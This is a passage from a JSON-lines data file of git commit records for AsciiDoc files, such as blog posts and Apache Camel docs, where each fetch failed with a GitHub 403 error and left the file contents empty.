interfaces\/README.adoc","new_file":"Objects & interfaces\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c280d6429ac89cb9e2d39713b0d30256608db7ad","subject":"Update 2016-09-23-wtf-log.adoc","message":"Update 2016-09-23-wtf-log.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-23-wtf-log.adoc","new_file":"_posts\/2016-09-23-wtf-log.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f7497d06a8992124eecbad33683f4ce8b9faff85","subject":"Update 2019-01-19-Vuejs-4.adoc","message":"Update 2019-01-19-Vuejs-4.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-01-19-Vuejs-4.adoc","new_file":"_posts\/2019-01-19-Vuejs-4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dc8f1afb2f667563ecfaa2fb0b07c9070765ad0a","subject":"Update 2016-10-14-Try-Line-Notify.adoc","message":"Update 2016-10-14-Try-Line-Notify.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e0ba825120ac2bddc1f91294f924505b5cef317f","subject":"y2b create post How Much Money Does Apple Pay Me?","message":"y2b create post How Much Money Does Apple Pay Me?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-04-03-How-Much-Money-Does-Apple-Pay-Me.adoc","new_file":"_posts\/2017-04-03-How-Much-Money-Does-Apple-Pay-Me.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cd87d36d555f752f70bd3af5fcddcbcc0cbb8720","subject":"--wip-- [skip ci]","message":"--wip-- [skip ci]\n","repos":"moccalotto\/kaos,moccalotto\/kaos","old_file":"_brainstorms\/sr-oneshot.asciidoc","new_file":"_brainstorms\/sr-oneshot.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/moccalotto\/kaos.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c6d576554f2af8d2d47386bca742b8e1f0baaa23","subject":"Update 2015-10-25-Middleman.adoc","message":"Update 2015-10-25-Middleman.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-10-25-Middleman.adoc","new_file":"_posts\/2015-10-25-Middleman.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"15e08af0bdf03e5c2fb82b00734db69db4515a6c","subject":"Update 2016-02-03-Attention.adoc","message":"Update 2016-02-03-Attention.adoc","repos":"jfavlam\/Concepts,jfavlam\/Concepts,jfavlam\/Concepts","old_file":"_posts\/2016-02-03-Attention.adoc","new_file":"_posts\/2016-02-03-Attention.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jfavlam\/Concepts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"706f47f3844f29ec70de7da31adb9d61384894e6","subject":"Update 2018-11-25-Amazon-Go.adoc","message":"Update 2018-11-25-Amazon-Go.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-25-Amazon-Go.adoc","new_file":"_posts\/2018-11-25-Amazon-Go.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"afe89a780c053dfc539310db898815639b517913","subject":"Update 2016-12-2-3-D.adoc","message":"Update 2016-12-2-3-D.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-2-3-D.adoc","new_file":"_posts\/2016-12-2-3-D.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bd61bbc2d4288b07db1971249033b760eeea87c7","subject":"Update 2018-08-10-P-W-A-for-mahjong.adoc","message":"Update 2018-08-10-P-W-A-for-mahjong.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dd30bf87f134a094bb94f5243f69541b2c07b747","subject":"Update 2019-02-01-g-R-P-C-Java-Ruby.adoc","message":"Update 2019-02-01-g-R-P-C-Java-Ruby.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-01-g-R-P-C-Java-Ruby.adoc","new_file":"_posts\/2019-02-01-g-R-P-C-Java-Ruby.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0f335a25618d0f58306c49f27b4ce9e29782f219","subject":"Add disclaimer","message":"Add disclaimer\n\n","repos":"OpenHFT\/Chronicle-Map","old_file":"DISCLAIMER.adoc","new_file":"DISCLAIMER.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OpenHFT\/Chronicle-Map.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dd80ec49f0cb3b08bfc04745045eb4cd8651ad14","subject":"0.10.0.CR2 release announcement","message":"0.10.0.CR2 release announcement\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2019-09-26-debezium-0-10-0-cr2-released.adoc","new_file":"blog\/2019-09-26-debezium-0-10-0-cr2-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4be770520bec015dcd66c0ab211d48de6e0a6fbf","subject":"Create api.adoc","message":"Create api.adoc","repos":"restSampleServices\/node-service,restSampleServices\/node-service,restSampleServices\/node-service","old_file":"doc\/api.adoc","new_file":"doc\/api.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/restSampleServices\/node-service.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ab41671d6d3b319a2c7911b97b7014a840335895","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2022\/01\/21\/deref.adoc","new_file":"content\/news\/2022\/01\/21\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"b6a502a6d1e481e91271fb1813b1a6d9c3942ecc","subject":"Update 2015-05-24-Mi-primer-articulo-Concepto-sobre-HubPress.adoc","message":"Update 
2015-05-24-Mi-primer-articulo-Concepto-sobre-HubPress.adoc","repos":"CarlosRPO\/carlosrpo.github.io,CarlosRPO\/carlosrpo.github.io,CarlosRPO\/carlosrpo.github.io","old_file":"_posts\/2015-05-24-Mi-primer-articulo-Concepto-sobre-HubPress.adoc","new_file":"_posts\/2015-05-24-Mi-primer-articulo-Concepto-sobre-HubPress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CarlosRPO\/carlosrpo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f861a88ce09644b11ea0dc48057dd90ec6ba737d","subject":"Update 2015-05-28-Retour-sur-le-Salon-des-Vins-de-Loire-2015.adoc","message":"Update 2015-05-28-Retour-sur-le-Salon-des-Vins-de-Loire-2015.adoc","repos":"quentindemolliens\/quentindemolliens.github.io,quentindemolliens\/quentindemolliens.github.io,quentindemolliens\/quentindemolliens.github.io,quentindemolliens\/quentindemolliens.github.io","old_file":"_posts\/2015-05-28-Retour-sur-le-Salon-des-Vins-de-Loire-2015.adoc","new_file":"_posts\/2015-05-28-Retour-sur-le-Salon-des-Vins-de-Loire-2015.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quentindemolliens\/quentindemolliens.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c717de11f7faa9c005e207ff7b27cb4f33cc67f7","subject":"Note snippet: First time you run a grails command","message":"Note snippet: First time you run a grails command\n","repos":"grails\/grails-guides,grails\/grails-guides,grails\/grails-guides","old_file":"src\/main\/docs\/common-firstTimeYouRunGrailsCommand.adoc","new_file":"src\/main\/docs\/common-firstTimeYouRunGrailsCommand.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grails\/grails-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3bcb7a8f097b0466d0cee548c5ecf9228daa38d0","subject":"Update 2018-11-28-Best-practices-for-Event-Sourcing.adoc","message":"Update 2018-11-28-Best-practices-for-Event-Sourcing.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2018-11-28-Best-practices-for-Event-Sourcing.adoc","new_file":"_posts\/2018-11-28-Best-practices-for-Event-Sourcing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cdd5b735f4fb5ce73c77e14268ef44edbdb875a1","subject":"Added spel-language to Gitbook","message":"Added spel-language to 
Gitbook\n","repos":"rmarting\/camel,christophd\/camel,bgaudaen\/camel,driseley\/camel,kevinearls\/camel,lburgazzoli\/apache-camel,gautric\/camel,kevinearls\/camel,rmarting\/camel,NickCis\/camel,nikhilvibhav\/camel,pmoerenhout\/camel,rmarting\/camel,neoramon\/camel,jonmcewen\/camel,adessaigne\/camel,pkletsko\/camel,chirino\/camel,onders86\/camel,lburgazzoli\/camel,lburgazzoli\/apache-camel,jkorab\/camel,isavin\/camel,veithen\/camel,sirlatrom\/camel,w4tson\/camel,gnodet\/camel,CodeSmell\/camel,christophd\/camel,tkopczynski\/camel,punkhorn\/camel-upstream,ssharma\/camel,CodeSmell\/camel,neoramon\/camel,Thopap\/camel,onders86\/camel,rmarting\/camel,Thopap\/camel,nboukhed\/camel,objectiser\/camel,jonmcewen\/camel,akhettar\/camel,RohanHart\/camel,jarst\/camel,jonmcewen\/camel,onders86\/camel,nicolaferraro\/camel,apache\/camel,akhettar\/camel,ssharma\/camel,isavin\/camel,hqstevenson\/camel,nikhilvibhav\/camel,Thopap\/camel,apache\/camel,RohanHart\/camel,alvinkwekel\/camel,yuruki\/camel,mcollovati\/camel,sverkera\/camel,pkletsko\/camel,driseley\/camel,gnodet\/camel,driseley\/camel,ullgren\/camel,sverkera\/camel,hqstevenson\/camel,jarst\/camel,prashant2402\/camel,nikhilvibhav\/camel,tadayosi\/camel,jarst\/camel,yuruki\/camel,JYBESSON\/camel,mcollovati\/camel,w4tson\/camel,RohanHart\/camel,lburgazzoli\/camel,prashant2402\/camel,tdiesler\/camel,pax95\/camel,gilfernandes\/camel,anton-k11\/camel,sverkera\/camel,tadayosi\/camel,pmoerenhout\/camel,snurmine\/camel,drsquidop\/camel,drsquidop\/camel,RohanHart\/camel,anton-k11\/camel,snurmine\/camel,cunningt\/camel,nboukhed\/camel,neoramon\/camel,adessaigne\/camel,scranton\/camel,jarst\/camel,veithen\/camel,Thopap\/camel,DariusX\/camel,akhettar\/camel,gilfernandes\/camel,dmvolod\/camel,scranton\/camel,driseley\/camel,tlehoux\/camel,allancth\/camel,nicolaferraro\/camel,jkorab\/camel,ssharma\/camel,pkletsko\/camel,bgaudaen\/camel,akhettar\/camel,objectiser\/camel,chirino\/camel,veithen\/camel,snurmine\/camel,rmarting\/camel,ssharma\/camel,scranton\/camel,jonmcewen\/camel,akhettar\/camel,snurmine\/camel,RohanHart\/camel,Fabryprog\/camel,tkopczynski\/camel,scranton\/camel,allancth\/camel,anoordover\/camel,christophd\/camel,gnodet\/camel,pmoerenhout\/camel,adessaigne\/camel,drsquidop\/camel,cunningt\/camel,apache\/camel,christophd\/camel,bgaudaen\/camel,bgaudaen\/camel,ullgren\/camel,acartapanis\/camel,JYBESSON\/camel,chirino\/camel,acartapanis\/camel,nicolaferraro\/camel,lburgazzoli\/apache-camel,jamesnetherton\/camel,christophd\/camel,gautric\/camel,cunningt\/camel,davidkarlsen\/camel,allancth\/camel,dmvolod\/camel,gautric\/camel,kevinearls\/camel,bhaveshdt\/camel,dmvolod\/camel,zregvart\/camel,pkletsko\/camel,adessaigne\/camel,mgyongyosi\/camel,gilfernandes\/camel,cunningt\/camel,pax95\/camel,acartapanis\/camel,NickCis\/camel,nikhilvibhav\/camel,curso007\/camel,DariusX\/camel,Fabryprog\/camel,hqstevenson\/camel,punkhorn\/camel-upstream,bhaveshdt\/camel,sabre1041\/camel,bgaudaen\/camel,YoshikiHigo\/camel,anoordover\/camel,anton-k11\/camel,kevinearls\/camel,tlehoux\/camel,bhaveshdt\/camel,anoordover\/camel,w4tson\/camel,hqstevenson\/camel,jamesnetherton\/camel,sirlatrom\/camel,CodeSmell\/camel,kevinearls\/camel,ssharma\/camel,YoshikiHigo\/camel,chirino\/camel,YoshikiHigo\/camel,NickCis\/camel,jkorab\/camel,cunningt\/camel,gautric\/camel,curso007\/camel,nicolaferraro\/camel,drsquidop\/camel,dmvolod\/camel,lburgazzoli\/apache-camel,isavin\/camel,alvinkwekel\/camel,chirino\/camel,gnodet\/camel,allancth\/camel,hqstevenson\/camel,zregvart\/camel,NickCis\/camel,neoramo
n\/camel,w4tson\/camel,tkopczynski\/camel,prashant2402\/camel,pax95\/camel,RohanHart\/camel,apache\/camel,prashant2402\/camel,DariusX\/camel,allancth\/camel,w4tson\/camel,tlehoux\/camel,salikjan\/camel,bhaveshdt\/camel,sabre1041\/camel,curso007\/camel,lburgazzoli\/camel,Thopap\/camel,DariusX\/camel,sabre1041\/camel,tlehoux\/camel,ssharma\/camel,CodeSmell\/camel,neoramon\/camel,jarst\/camel,JYBESSON\/camel,tlehoux\/camel,lburgazzoli\/camel,mgyongyosi\/camel,sabre1041\/camel,YoshikiHigo\/camel,tkopczynski\/camel,JYBESSON\/camel,veithen\/camel,gilfernandes\/camel,dmvolod\/camel,onders86\/camel,dmvolod\/camel,lburgazzoli\/camel,gnodet\/camel,sverkera\/camel,anton-k11\/camel,onders86\/camel,yuruki\/camel,yuruki\/camel,mcollovati\/camel,mgyongyosi\/camel,tdiesler\/camel,YoshikiHigo\/camel,anoordover\/camel,tadayosi\/camel,cunningt\/camel,isavin\/camel,sabre1041\/camel,scranton\/camel,pax95\/camel,tadayosi\/camel,mgyongyosi\/camel,pkletsko\/camel,acartapanis\/camel,bhaveshdt\/camel,apache\/camel,pmoerenhout\/camel,bgaudaen\/camel,jamesnetherton\/camel,sirlatrom\/camel,yuruki\/camel,isavin\/camel,jarst\/camel,davidkarlsen\/camel,davidkarlsen\/camel,tdiesler\/camel,mgyongyosi\/camel,jamesnetherton\/camel,gilfernandes\/camel,lburgazzoli\/camel,jkorab\/camel,NickCis\/camel,JYBESSON\/camel,pmoerenhout\/camel,tdiesler\/camel,gautric\/camel,christophd\/camel,snurmine\/camel,apache\/camel,veithen\/camel,anoordover\/camel,YoshikiHigo\/camel,acartapanis\/camel,driseley\/camel,jamesnetherton\/camel,jkorab\/camel,zregvart\/camel,tkopczynski\/camel,anton-k11\/camel,NickCis\/camel,rmarting\/camel,punkhorn\/camel-upstream,tdiesler\/camel,allancth\/camel,gautric\/camel,onders86\/camel,akhettar\/camel,nboukhed\/camel,punkhorn\/camel-upstream,sirlatrom\/camel,Fabryprog\/camel,chirino\/camel,sirlatrom\/camel,pkletsko\/camel,mcollovati\/camel,jkorab\/camel,curso007\/camel,bhaveshdt\/camel,prashant2402\/camel,nboukhed\/camel,mgyongyosi\/camel,driseley\/camel,gilfernandes\/camel,ullgren\/camel,sabre1041\/camel,zregvart\/camel,veithen\/camel,tdiesler\/camel,JYBESSON\/camel,objectiser\/camel,ullgren\/camel,curso007\/camel,objectiser\/camel,tlehoux\/camel,nboukhed\/camel,davidkarlsen\/camel,lburgazzoli\/apache-camel,nboukhed\/camel,tkopczynski\/camel,jamesnetherton\/camel,drsquidop\/camel,acartapanis\/camel,sverkera\/camel,prashant2402\/camel,Thopap\/camel,snurmine\/camel,neoramon\/camel,pmoerenhout\/camel,sirlatrom\/camel,adessaigne\/camel,lburgazzoli\/apache-camel,Fabryprog\/camel,alvinkwekel\/camel,scranton\/camel,curso007\/camel,isavin\/camel,anton-k11\/camel,pax95\/camel,w4tson\/camel,hqstevenson\/camel,kevinearls\/camel,anoordover\/camel,drsquidop\/camel,salikjan\/camel,pax95\/camel,jonmcewen\/camel,alvinkwekel\/camel,tadayosi\/camel,yuruki\/camel,jonmcewen\/camel,sverkera\/camel,tadayosi\/camel,adessaigne\/camel","old_file":"components\/camel-spring\/src\/main\/docs\/spel-language.adoc","new_file":"components\/camel-spring\/src\/main\/docs\/spel-language.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/allancth\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ab9885db58502c53c56ff4980f155171124ce168","subject":"y2b create post Holiday Deal Box + $50,000 Giveaway","message":"y2b create post Holiday Deal Box + $50,000 
Giveaway","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-11-25-Holiday-Deal-Box--50000-Giveaway.adoc","new_file":"_posts\/2016-11-25-Holiday-Deal-Box--50000-Giveaway.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"448176bd9cdc32f846c0dbb1c50e243b718b5033","subject":"y2b create post Check Out This Crazy Gadget I Found...","message":"y2b create post Check Out This Crazy Gadget I Found...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-05-21-Check-Out-This-Crazy-Gadget-I-Found.adoc","new_file":"_posts\/2017-05-21-Check-Out-This-Crazy-Gadget-I-Found.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5fd08ba77b9cb7d85b89615995bdc34b8b88133f","subject":"job #12330 add minutes from initial review","message":"job #12330 add minutes from initial review\n","repos":"xtuml\/bridgepoint,travislondon\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,travislondon\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,travislondon\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint","old_file":"doc-bridgepoint\/review-minutes\/12330_textual_xtuml.adoc","new_file":"doc-bridgepoint\/review-minutes\/12330_textual_xtuml.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cortlandstarrett\/bridgepoint.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"602a1e9d0a5db268cac89c88f16f4110cc49574a","subject":"Update 2016-12-01-Mediashare-Chat.adoc","message":"Update 2016-12-01-Mediashare-Chat.adoc","repos":"Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io","old_file":"_posts\/2016-12-01-Mediashare-Chat.adoc","new_file":"_posts\/2016-12-01-Mediashare-Chat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mediashare\/Mediashare.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"099ab44a9ebe731bbb25362f65737bdb1f99d7eb","subject":"Update 2015-02-16-Razrabotka-i-tvorchestvo.adoc","message":"Update 
2015-02-16-Razrabotka-i-tvorchestvo.adoc","repos":"alchapone\/alchapone.github.io,alchapone\/alchapone.github.io,alchapone\/alchapone.github.io","old_file":"_posts\/2015-02-16-Razrabotka-i-tvorchestvo.adoc","new_file":"_posts\/2015-02-16-Razrabotka-i-tvorchestvo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alchapone\/alchapone.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"84d786f9c2bf754970a707ffd78531e8d6ddaf67","subject":"Update 2016-03-20-Comment-arreter-de-ronfler.adoc","message":"Update 2016-03-20-Comment-arreter-de-ronfler.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-Comment-arreter-de-ronfler.adoc","new_file":"_posts\/2016-03-20-Comment-arreter-de-ronfler.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fe4d71f147bc2939434a7fe3a6fd819c9fead402","subject":"Fixed missing file extension.","message":"Fixed missing file extension.\n","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"src\/docs\/asciidoc\/wiki\/admonitions.adoc","new_file":"src\/docs\/asciidoc\/wiki\/admonitions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jMonkeyEngine\/wiki.jmonkeyengine.org.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"b4244c72f5ff3a16d0216f1a41349c0c0deadfa3","subject":"add manually post","message":"add manually post\n","repos":"binout\/javaonemorething,binout\/javaonemorething,binout\/javaonemorething,binout\/javaonemorething","old_file":"_posts\/2011-10-04-Day-one---Technical-Keynote.adoc","new_file":"_posts\/2011-10-04-Day-one---Technical-Keynote.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/binout\/javaonemorething.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"15cc4f53425f60910fbd705b93252509ab3084e0","subject":"Update 2017-10-20-Mac-Tableau-Desktop-Treasure-Data.adoc","message":"Update 2017-10-20-Mac-Tableau-Desktop-Treasure-Data.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-20-Mac-Tableau-Desktop-Treasure-Data.adoc","new_file":"_posts\/2017-10-20-Mac-Tableau-Desktop-Treasure-Data.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c1c43aec54244c55e8305d57435c5d2c24fdb071","subject":"CAMEL-12053 - Generated docs for Camel-AWS-MQ","message":"CAMEL-12053 - Generated docs for 
Camel-AWS-MQ\n","repos":"dmvolod\/camel,kevinearls\/camel,tdiesler\/camel,apache\/camel,mcollovati\/camel,nicolaferraro\/camel,apache\/camel,gautric\/camel,onders86\/camel,punkhorn\/camel-upstream,rmarting\/camel,tdiesler\/camel,mcollovati\/camel,kevinearls\/camel,punkhorn\/camel-upstream,anoordover\/camel,apache\/camel,adessaigne\/camel,gnodet\/camel,curso007\/camel,dmvolod\/camel,ullgren\/camel,dmvolod\/camel,pmoerenhout\/camel,rmarting\/camel,curso007\/camel,ullgren\/camel,tadayosi\/camel,anoordover\/camel,gautric\/camel,anoordover\/camel,alvinkwekel\/camel,snurmine\/camel,curso007\/camel,onders86\/camel,cunningt\/camel,sverkera\/camel,cunningt\/camel,DariusX\/camel,sverkera\/camel,gnodet\/camel,jonmcewen\/camel,pax95\/camel,dmvolod\/camel,anoordover\/camel,pmoerenhout\/camel,curso007\/camel,rmarting\/camel,gautric\/camel,jamesnetherton\/camel,objectiser\/camel,apache\/camel,davidkarlsen\/camel,jamesnetherton\/camel,tadayosi\/camel,sverkera\/camel,akhettar\/camel,alvinkwekel\/camel,rmarting\/camel,curso007\/camel,akhettar\/camel,akhettar\/camel,tadayosi\/camel,davidkarlsen\/camel,nicolaferraro\/camel,jamesnetherton\/camel,nikhilvibhav\/camel,zregvart\/camel,pax95\/camel,CodeSmell\/camel,gautric\/camel,ullgren\/camel,akhettar\/camel,christophd\/camel,gnodet\/camel,pax95\/camel,mcollovati\/camel,christophd\/camel,DariusX\/camel,alvinkwekel\/camel,cunningt\/camel,DariusX\/camel,apache\/camel,gnodet\/camel,christophd\/camel,gnodet\/camel,tdiesler\/camel,mcollovati\/camel,jonmcewen\/camel,alvinkwekel\/camel,CodeSmell\/camel,apache\/camel,jonmcewen\/camel,cunningt\/camel,christophd\/camel,jamesnetherton\/camel,onders86\/camel,gautric\/camel,jonmcewen\/camel,jamesnetherton\/camel,kevinearls\/camel,christophd\/camel,Fabryprog\/camel,kevinearls\/camel,DariusX\/camel,sverkera\/camel,dmvolod\/camel,cunningt\/camel,rmarting\/camel,curso007\/camel,onders86\/camel,Fabryprog\/camel,CodeSmell\/camel,CodeSmell\/camel,pmoerenhout\/camel,snurmine\/camel,pmoerenhout\/camel,dmvolod\/camel,onders86\/camel,punkhorn\/camel-upstream,objectiser\/camel,zregvart\/camel,onders86\/camel,snurmine\/camel,objectiser\/camel,jonmcewen\/camel,gautric\/camel,adessaigne\/camel,ullgren\/camel,pmoerenhout\/camel,nikhilvibhav\/camel,tadayosi\/camel,christophd\/camel,davidkarlsen\/camel,tadayosi\/camel,pax95\/camel,punkhorn\/camel-upstream,pax95\/camel,adessaigne\/camel,adessaigne\/camel,pmoerenhout\/camel,adessaigne\/camel,nicolaferraro\/camel,rmarting\/camel,tdiesler\/camel,akhettar\/camel,snurmine\/camel,sverkera\/camel,jamesnetherton\/camel,kevinearls\/camel,zregvart\/camel,pax95\/camel,nikhilvibhav\/camel